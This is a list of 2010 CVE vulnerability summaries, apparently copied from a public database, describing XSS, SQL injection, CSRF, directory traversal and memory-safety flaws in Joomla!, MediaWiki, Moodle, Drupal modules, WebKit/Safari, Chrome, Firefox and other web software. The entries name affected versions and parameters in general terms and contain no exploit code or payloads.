[CVE-2010-1649] Multiple cross-site scripting (XSS) vulnerabilities in the back end in Joomla! 1.5 through 1.5.17 allow remote attackers to inject arbitrary web script or HTML via unknown vectors related to "various administrator screens," possibly the search parameter in administrator/index.php.
[CVE-2010-1648] Cross-site request forgery (CSRF) vulnerability in the login interface in MediaWiki 1.15 before 1.15.4 and 1.16 before 1.16 beta 3 allows remote attackers to hijack the authentication of users for requests that (1) create accounts or (2) reset passwords, related to the Special:Userlogin form.
[CVE-2010-1647] Cross-site scripting (XSS) vulnerability in MediaWiki 1.15 before 1.15.4 and 1.16 before 1.16 beta 3 allows remote attackers to inject arbitrary web script or HTML via crafted Cascading Style Sheets (CSS) strings that are processed as script by Internet Explorer.
[CVE-2010-1644] Multiple cross-site scripting (XSS) vulnerabilities in Cacti before 0.8.7f, as used in Red Hat High Performance Computing (HPC) Solution and other products, allow remote attackers to inject arbitrary web script or HTML via the (1) hostname or (2) description parameter to host.php, or (3) the host_id parameter to data_sources.php.
[CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
[CVE-2010-1629] Cross-site scripting (XSS) vulnerability in Phorum before 5.2.15 allows remote attackers to inject arbitrary web script or HTML via an invalid email address.
[CVE-2010-1625] Cross-site scripting (XSS) vulnerability in LXR Cross Referencer before 0.9.7 allows remote attackers to inject arbitrary web script or HTML via vectors related to the search body and the results page for a search, a different vulnerability than CVE-2009-4497 and CVE-2010-1448.
[CVE-2010-1619] Cross-site scripting (XSS) vulnerability in the fix_non_standard_entities function in the KSES HTML text cleaning library (weblib.php), as used in Moodle 1.8.x before 1.8.12 and 1.9.x before 1.9.8, allows remote attackers to inject arbitrary web script or HTML via crafted HTML entities.
[CVE-2010-1618] Cross-site scripting (XSS) vulnerability in the phpCAS client library before 1.1.0, as used in Moodle 1.8.x before 1.8.12 and 1.9.x before 1.9.8, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, which is not properly handled in an error message.
[CVE-2010-1614] Multiple cross-site scripting (XSS) vulnerabilities in Moodle 1.8.x before 1.8.12 and 1.9.x before 1.9.8 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the Login-As feature or (2) when the global search feature is enabled, unspecified global search forms in the Global Search Engine. NOTE: vector 1 might be resultant from a cross-site request forgery (CSRF) vulnerability.
[CVE-2010-1609] Cross-site scripting (XSS) vulnerability in SAP NetWeaver 2004 before SP21 and 2004s before SP13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1606] Multiple cross-site scripting (XSS) vulnerabilities in NCT Jobs Portal Script allow remote attackers to inject arbitrary web script or HTML via the (1) search, (2) Keywords, (3) Tags, or (4) Desired City field.
[CVE-2010-1599] SQL injection vulnerability in loadorder.php in NKInFoWeb 2.5 and 5.2.2.0 allows remote attackers to execute arbitrary SQL commands via the id_sp parameter.
[CVE-2010-1594] Multiple cross-site scripting (XSS) vulnerabilities in ocsreports/index.php in OCS Inventory NG 1.02.1 allow remote attackers to inject arbitrary web script or HTML via (1) the query string, (2) the BASE parameter, or (3) the ega_1 parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-1593] Multiple cross-site scripting (XSS) vulnerabilities in SilverStripe before 2.3.5 allow remote attackers to inject arbitrary web script or HTML via (1) the CommenterURL parameter to PostCommentForm, and in the Forum module before 0.2.5 in SilverStripe before 2.3.5 allow remote attackers to inject arbitrary web script or HTML via (2) the Search parameter to forums/search (aka the search script).
[CVE-2010-1590] Cross-site scripting (XSS) vulnerability in shopsessionsubs.asp in Rocksalt International VP-ASP Shopping Cart 6.50 and earlier might allow remote attackers to inject arbitrary web script or HTML via the client's DNS hostname (aka the REMOTE_HOST variable), related to the CookielessGenerateFilename and CookielessReadFile functions.
[CVE-2010-1588] SQL injection vulnerability in the Getwebsess function in shopsessionsubs.asp in Rocksalt International VP-ASP Shopping Cart 6.50 and earlier allows remote attackers to execute arbitrary SQL commands via the websess parameter.
[CVE-2010-1586] Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter.
[CVE-2010-1584] Cross-site scripting (XSS) vulnerability in the Context module before 6.x-2.0-rc4 for Drupal allows remote authenticated users, with Administer Blocks privileges, to inject arbitrary web script or HTML via a block description.
[CVE-2010-1557] Multiple cross-site scripting (XSS) vulnerabilities in HP Insight Control Server Migration before 6.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1543] Cross-site scripting (XSS) vulnerability in the eTracker module before 6.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML by appending a crafted string to an arbitrary URL associated with the Drupal site.
[CVE-2010-1541] Multiple cross-site scripting (XSS) vulnerabilities in DFD Cart 1.198, 1.197, and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) category and (2) list_quantity parameters to index.php, and the (3) category parameter to your.order.php.
[CVE-2010-1539] Cross-site scripting (XSS) vulnerability in the Workflow module 5.x-2.x before 5.x-2.6 and 6.x-1.x before 6.x-1.4 for Drupal, when used with the Token module, might allow remote authenticated users to inject arbitrary web script or HTML via a certain Comment field.
[CVE-2010-1536] Cross-site scripting (XSS) vulnerability in the AddThis Button module 5.x before 5.x-2.2 and 6.x before 6.x-2.9 for Drupal allows remote authenticated users, with administer addthis privileges, to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1527] Stack-based buffer overflow in Novell iPrint Client before 5.44 allows remote attackers to execute arbitrary code via a long call-back-url parameter in an op-client-interface-version action.
[CVE-2010-1520] Cross-site scripting (XSS) vulnerability in logout.php in TaskFreak! Original multi user before 0.6.4 allows remote attackers to inject arbitrary web script or HTML via the tznMessage parameter.
[CVE-2010-1515] Multiple cross-site scripting (XSS) vulnerabilities in index.php in TomatoCMS 2.0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) keyword or (2) article-id parameter in conjunction with a /admin/news/article/list PATH_INFO.
[CVE-2010-1507] WebYaST in yast2-webclient in SUSE Linux Enterprise (SLE) 11 on the WebYaST appliance uses a fixed secret key that is embedded in the appliance's image, which allows remote attackers to spoof session cookies by leveraging knowledge of this key.
[CVE-2010-1504] Cross-site scripting (XSS) vulnerability in Google Chrome before 4.1.249.1059 allows remote attackers to inject arbitrary web script or HTML via vectors related to a chrome://downloads URI.
[CVE-2010-1503] Cross-site scripting (XSS) vulnerability in Google Chrome before 4.1.249.1059 allows remote attackers to inject arbitrary web script or HTML via vectors related to a chrome://net-internals URI.
[CVE-2010-1497] Cross-site scripting (XSS) vulnerability in download_proc.php in dl_stats before 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2010-1489] The XSS Filter in Microsoft Internet Explorer 8 does not properly perform neutering for the SCRIPT tag, which allows remote attackers to conduct cross-site scripting (XSS) attacks against web sites that have no inherent XSS vulnerabilities, a different issue than CVE-2009-4074.
[CVE-2010-1486] Multiple cross-site scripting (XSS) vulnerabilities in _invoice.asp in CactuShop before 6.155 allow remote attackers to inject arbitrary web script or HTML via the (1) billing address or (2) shipping address.
[CVE-2010-1482] Cross-site scripting (XSS) vulnerability in admin/editprefs.php in the backend in CMS Made Simple (CMSMS) before 1.7.1 might allow remote attackers to inject arbitrary web script or HTML via the date_format_string parameter.
[CVE-2010-1481] Cross-site scripting (XSS) vulnerability in the table feature in PmWiki 2.2.15 allows remote authenticated users to inject arbitrary web script or HTML via the width attribute.
[CVE-2010-1470] Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
[CVE-2010-1464] Multiple cross-site scripting (XSS) vulnerabilities in WebAsyst Shop-Script FREE allow remote attackers to inject arbitrary web script or HTML via the (1) currency_id_left, (2) currency_id_right, (3) darkcolor, (4) lightcolor, (5) middlecolor, and (6) w parameters.
[CVE-2010-1463] Multiple SQL injection vulnerabilities in WebAsyst Shop-Script FREE allow attackers to execute arbitrary SQL commands via the (1) add2cart, (2) c_id, (3) categoryID, (4) list_price, (5) name, (6) new_offer, (7) price, (8) product_code, (9) productID, (10) rating, and (11) save_product parameters.
[CVE-2010-1462] Directory traversal vulnerability in WebAsyst Shop-Script FREE has unknown impact and attack vectors via the sub parameter.
[CVE-2010-1454] com.springsource.tcserver.serviceability.rmi.JmxSocketListener in VMware SpringSource tc Server Runtime 6.0.19 and 6.0.20 before 6.0.20.D, and 6.0.25.A before 6.0.25.A-SR01, does not properly enforce the requirement for an encrypted (aka s2enc) password, which allows remote attackers to obtain JMX interface access via a blank password.
[CVE-2010-1453] Cross-site scripting (XSS) vulnerability in the Login form in Piwik 0.1.6 through 0.5.5 allows remote attackers to inject arbitrary web script or HTML via the form_url parameter.
[CVE-2010-1448] Cross-site scripting (XSS) vulnerability in lib/LXR/Common.pm in LXR Cross Referencer before 0.9.8 allows remote attackers to inject arbitrary web script or HTML via vectors related to a string in the search page's TITLE element, a different vulnerability than CVE-2009-4497 and CVE-2010-1625.
[CVE-2010-1438] Web Application Finger Printer (WAFP) 0.01-26c3 uses fixed pathnames under /tmp for temporary files and directories, which (1) allows local users to cause a denial of service (application outage) by creating a file with a pathname that the product expects is available for its own internal use, (2) allows local users to overwrite arbitrary files via symlink attacks on certain files in /tmp, (3) might allow local users to delete arbitrary files and directories via a symlink attack on a directory under /tmp, and (4) might make it easier for local users to obtain sensitive information by reading files in a directory under /tmp, related to (a) lib/wafp_pidify.rb, (b) utils/generate_wafp_fingerprint.sh, (c) utils/online_update.sh, and (d) utils/extract_from_db.sh.
[CVE-2010-1429] Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.
[CVE-2010-1428] The Web Console (aka web-console) in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to obtain sensitive information via an unspecified request that uses a different method.
[CVE-2010-1427] Cross-site scripting (XSS) vulnerability in the SearchHighlight plugin in MODx Evolution before 1.0.3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to AjaxSearch.
[CVE-2010-1426] SQL injection vulnerability in MODx Evolution before 1.0.3 allows remote attackers to execute arbitrary SQL commands via unknown vectors related to WebLogin.
[CVE-2010-1422] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle changes to keyboard focus that occur during processing of key press events, which allows remote attackers to force arbitrary key presses via a crafted HTML document.
[CVE-2010-1421] The execCommand JavaScript function in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly restrict remote execution of clipboard commands, which allows remote attackers to modify the clipboard via a crafted HTML document.
[CVE-2010-1420] Cross-site scripting (XSS) vulnerability in CFNetwork in Apple Safari before 5.0.6 allows remote attackers to inject arbitrary web script or HTML via a crafted text/plain file.
[CVE-2010-1419] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows user-assisted remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving a certain window close action that occurs during a drag-and-drop operation.
[CVE-2010-1418] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via a FRAME element with a SRC attribute composed of a javascript: sequence preceded by spaces.
[CVE-2010-1417] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via HTML content that contains multiple :after pseudo-selectors.
[CVE-2010-1416] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly restrict the reading of a canvas that contains an SVG image pattern from a different web site, which allows remote attackers to read images from other sites via a crafted canvas, related to a "cross-site image capture issue."
[CVE-2010-1415] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle libxml contexts, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to an "API abuse issue."
[CVE-2010-1414] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the removeChild DOM method.
[CVE-2010-1413] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends NTLM credentials in cleartext in unspecified circumstances, which allows man-in-the-middle attackers to obtain sensitive information via unspecified vectors.
[CVE-2010-1412] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to hover events.
[CVE-2010-1410] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via an SVG document with nested use elements.
[CVE-2010-1409] Incomplete blacklist vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to trigger disclosure of data over IRC via vectors involving an IRC service port.
[CVE-2010-1408] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to bypass intended restrictions on outbound connections to "non-default TCP ports" via a crafted port number, related to an "integer truncation issue." NOTE: this may overlap CVE-2010-1099.
[CVE-2010-1407] WebKit in Apple iOS before 4 on the iPhone and iPod touch does not properly implement the history.replaceState method in certain situations involving IFRAME elements, which allows remote attackers to obtain sensitive information via a crafted HTML document.
[CVE-2010-1406] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends an https URL in the Referer header of an http request in certain circumstances involving https to http redirection, which allows remote HTTP servers to obtain potentially sensitive information via standard HTTP logging, a related issue to CVE-2010-0660.
[CVE-2010-1405] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML element that has custom vertical positioning.
[CVE-2010-1404] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an SVG document that contains recursive Use elements, which are not properly handled during page deconstruction.
[CVE-2010-1403] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses uninitialized memory during the handling of a use element in an SVG document, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted document containing XML that triggers a parsing error, related to ProcessInstruction.
[CVE-2010-1402] Double free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to an event listener in an SVG document, related to duplicate event listeners, a timer, and an AnimateTransform object.
[CVE-2010-1401] Use-after-free vulnerability in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving the :first-letter pseudo-element.
[CVE-2010-1400] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving caption elements.
[CVE-2010-1399] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses uninitialized memory during a selection change on a form input element, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document.
[CVE-2010-1398] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly perform ordered list insertions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document, related to the insertion of an unspecified element into an editable container and the access of an uninitialized element.
[CVE-2010-1397] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to a layout change during selection rendering and the DOCUMENT_POSITION_DISCONNECTED attribute in a container of an unspecified type.
[CVE-2010-1396] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the contentEditable attribute and removing container elements.
[CVE-2010-1395] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving DOM constructor objects, related to a "scope management issue."
[CVE-2010-1394] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving HTML document fragments.
[CVE-2010-1393] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to discover sensitive URLs via an HREF attribute associated with a redirecting URL.
[CVE-2010-1392] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to HTML buttons and the first-letter CSS style.
[CVE-2010-1391] Multiple directory traversal vulnerabilities in the (a) Local Storage and (b) Web SQL database implementations in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allow remote attackers to create arbitrary database files via vectors involving a (1) %2f and .. (dot dot) or (2) %5c and .. (dot dot) in a URL.
[CVE-2010-1390] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors related to improper UTF-7 canonicalization, and lack of termination of a quoted string in an HTML document.
[CVE-2010-1389] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors involving a (1) paste or (2) drag-and-drop operation for a selection.
[CVE-2010-1388] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6, and before 4.1 on Mac OS X 10.4, does not properly handle clipboard (1) drag and (2) paste operations for URLs, which allows user-assisted remote attackers to read arbitrary files via a crafted HTML document.
[CVE-2010-1387] Use-after-free vulnerability in JavaScriptCore in WebKit in Apple iTunes before 9.2 on Windows, and Apple iOS before 4 on the iPhone and iPod touch, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to page transitions, a different vulnerability than CVE-2010-1763 and CVE-2010-1769.
[CVE-2010-1386] page/Geolocation.cpp in WebCore in WebKit before r56188 and before 1.2.5 does not properly restrict access to the lastPosition function, which has unspecified impact and remote attack vectors, aka rdar problem 7746357.
[CVE-2010-1383] CFNetwork in Apple Safari before 5.0.6 on Windows allows remote web servers to execute arbitrary code by replaying the NTLM credentials of a client user, related to a "credential reflection" issue.
[CVE-2010-1382] Cross-site scripting (XSS) vulnerability in Wiki Server in Apple Mac OS X 10.5.8, and 10.6 before 10.6.4, allows remote authenticated users to inject arbitrary web script or HTML via crafted Wiki content, related to lack of a charset field.
[CVE-2010-1373] Cross-site scripting (XSS) vulnerability in Help Viewer in Apple Mac OS X 10.6 before 10.6.4 allows remote attackers to inject arbitrary web script or HTML via a crafted help: URL, related to "URL parameters in HTML content."
[CVE-2010-1371] Cross-site scripting (XSS) vulnerability in signup.asp in Pre Classified Listings ASP allows remote attackers to inject arbitrary web script or HTML via the address parameter.
[CVE-2010-1367] Multiple cross-site scripting (XSS) vulnerabilities in admin/admin_login.php in Uiga Fan Club, as downloaded on 20100310, allow remote attackers to inject arbitrary web script or HTML via the (1) admin_name and (2) admin_password parameters. NOTE: the provenance of this information is unknown.
[CVE-2010-1362] Cross-site scripting (XSS) vulnerability in the Own Term module 6.x-1.0 for Drupal allows remote authenticated users, with "create additional terms" privileges, to inject arbitrary web script or HTML via the term description field in a term listing page.
[CVE-2010-1361] Cross-site scripting (XSS) vulnerability in shop/USER_ARTIKEL_HANDLING_AUFRUF.php in PHPepperShop 2.5 allows remote attackers to inject arbitrary web script or HTML via the darstellen parameter.
[CVE-2010-1358] Cross-site scripting (XSS) vulnerability in the Bibliography (Biblio) module 5.x through 5.x-1.17 and 6.x through 6.x-1.9 for Drupal allows remote authenticated users, with "administer biblio" privileges, to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1357] Cross-site scripting (XSS) vulnerability in editors/logindialogue.php in SBD Directory Software 4.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2010-1355] Cross-site scripting (XSS) vulnerability on the TANDBERG Video Communication Server (VCS) before X5.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Reference ID 66316.
[CVE-2010-1348] Unspecified vulnerability in the login process in IBM WebSphere Portal 6.0.1.1, and 6.1.0.x before 6.1.0.3 Cumulative Fix 03, has unknown impact and remote attack vectors.
[CVE-2010-1339] Cross-site scripting (XSS) vulnerability in ts_other.php in the Teamsite Hack plugin 3.0 and earlier for WoltLab Burning Board allows remote attackers to inject arbitrary web script or HTML via the userid parameter in a modboard action, which is not properly handled in a forced SQL error message. NOTE: the provenance of this information is unknown.
[CVE-2010-1333] Multiple cross-site scripting (XSS) vulnerabilities in Almas Inc. Compiere J300_A02 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1332] Cross-site scripting (XSS) vulnerability in PrettyBook PrettyFormMail allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1329] Imperva SecureSphere Web Application Firewall and Database Firewall 5.0.0.5082 through 7.0.0.7078 allow remote attackers to bypass intrusion-prevention functionality via a request that has an appended long string containing an unspecified manipulation.
[CVE-2010-1328] Multiple cross-site scripting (XSS) vulnerabilities in TornadoStore 1.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tipo or (2) destino parameter to login_registrese.php3 in the Services section, (3) the rubro parameter to precios.php3 in the Products section, (4) the arti parameter to recomenda_articulo.php3 in the Products section, (5) the descrip parameter in a profile action to control/abm_det.php3 in the e-Commerce section, (6) the tit parameter in a delivery_courier action to control/abm_list.php3 in the e-Commerce section, or (7) the tit parameter in a usuario action to control/abm_det.php3 in the e-Commerce section.
[CVE-2010-1315] Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2010-1303] Multiple cross-site scripting (XSS) vulnerabilities in the Taxonomy Filter module 6.x before 6.x-1.1 for Drupal allow remote authenticated users, with administer taxonomy permissions or create node permissions when free tagging is enabled, to inject arbitrary web script or HTML via vocabulary (1) names, (2) terms, and (3) filter menus.
[CVE-2010-1302] Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
[CVE-2010-1293] Cross-site scripting (XSS) vulnerability in the Administrator page in Adobe ColdFusion 8.0, 8.0.1, and 9.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1276] Multiple cross-site scripting (XSS) vulnerabilities in BBSXP 2008 SP2 allow remote attackers to inject arbitrary web script or HTML via the URI in a request to (1) AddPost.asp, (2) AddTopic.asp, (3) Admin_Default.asp, (4) Bank.asp, (5) Manage.asp, and (6) ShowPost.asp. NOTE: the provenance of this information is unknown.
[CVE-2010-1275] Cross-site scripting (XSS) vulnerability in ShowPost.asp in BBSXP 2008 allows remote attackers to inject arbitrary web script or HTML via the ThreadID parameter.
[CVE-2010-1274] Cross-site scripting (XSS) vulnerability in Emweb Wt before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to "insertions of the URL" that occur during a redirection.
[CVE-2010-1273] Emweb Wt before 3.1.1 does not validate the UTF-8 encoding of (1) form values and (2) JSignal arguments, which has unspecified impact and remote attack vectors.
[CVE-2010-1267] Multiple directory traversal vulnerabilities in WebMaid CMS 0.2-6 Beta and earlier allow remote attackers to read arbitrary files via directory traversal sequences in the com parameter to (1) cContactus.php, (2) cGuestbook.php, and (3) cArticle.php.
[CVE-2010-1266] Multiple PHP remote file inclusion vulnerabilities in WebMaid CMS 0.2-6 Beta and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) template, (2) menu, (3) events, and (4) SITEROOT parameters to template/babyweb/index.php.
[CVE-2010-1236] The protocolIs function in platform/KURLGoogle.cpp in WebCore in WebKit before r55822, as used in Google Chrome before 4.1.249.1036 and Flock Browser 3.x before 3.0.0.4112, does not properly handle whitespace at the beginning of a URL, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted javascript: URL, as demonstrated by a \x00javascript:alert sequence.
[CVE-2010-1233] Multiple integer overflows in Google Chrome before 4.1.249.1036 allow remote attackers to have an unspecified impact via vectors involving WebKit JavaScript objects.
[CVE-2010-1230] Google Chrome before 4.1.249.1036 does not have the expected behavior for attempts to delete Web SQL Databases and clear the Strict Transport Security (STS) state, which has unspecified impact and attack vectors.
[CVE-2010-1227] Cross-site scripting (XSS) vulnerability in Sun Java System Communications Express 6.2 and 6.3 allows remote attackers to inject arbitrary web script or HTML via the subject field of a message, as demonstrated by a subject containing an IMG element with a SRC attribute that performs a cross-site request forgery (CSRF) attack involving the cmd and argv parameters to cmd.msc.
[CVE-2010-1218] Cross-site scripting (XSS) vulnerability in the mm_forum extension 1.8.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1213] The importScripts Web Worker method in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 does not verify that content is valid JavaScript code, which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted HTML document.
[CVE-2010-1209] Use-after-free vulnerability in the NodeIterator implementation in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, and SeaMonkey before 2.0.6, allows remote attackers to execute arbitrary code via a crafted NodeFilter that detaches DOM nodes, related to the NodeIterator interface and a javascript callback.
[CVE-2010-1206] The startDocumentLoad function in browser/base/content/browser.js in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, and SeaMonkey before 2.0.6, does not properly implement the Same Origin Policy in certain circumstances related to the about:blank document and a document that is currently loading, which allows (1) remote web servers to conduct spoofing attacks via vectors involving a 204 (aka No Content) status code, and allows (2) remote attackers to conduct spoofing attacks via vectors involving a window.stop call.
[CVE-2010-1195] Cross-site scripting (XSS) vulnerability in the htmlscrubber component in ikiwiki 2.x before 2.53.5 and 3.x before 3.20100312 allows remote attackers to inject arbitrary web script or HTML via a crafted data:image/svg+xml URI.
[CVE-2010-1193] Cross-site scripting (XSS) vulnerability in WebAccess in VMware Server 2.0 allows remote attackers to inject arbitrary web script or HTML via vectors related to JSON error messages.
[CVE-2010-1189] MediaWiki before 1.15.2 does not prevent wiki editors from linking to images from other web sites in wiki pages, which allows editors to obtain IP addresses and other information of wiki users by adding a link to an image on an attacker-controlled web site, aka "CSS validation issue."
[CVE-2010-1186] Cross-site scripting (XSS) vulnerability in xml/media-rss.php in the NextGEN Gallery plugin before 1.5.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the mode parameter.
[CVE-2010-1182] Multiple unspecified vulnerabilities in the administrative console in IBM WebSphere Application Server (WAS) 7.0.x before 7.0.0.9 on z/OS have unknown impact and attack vectors.
[CVE-2010-1175] Microsoft Internet Explorer 7.0 on Windows XP and Windows Server 2003 allows remote attackers to have an unspecified impact via a certain XML document that references a crafted web site in the SRC attribute of an image element, related to a "0day Vulnerability."
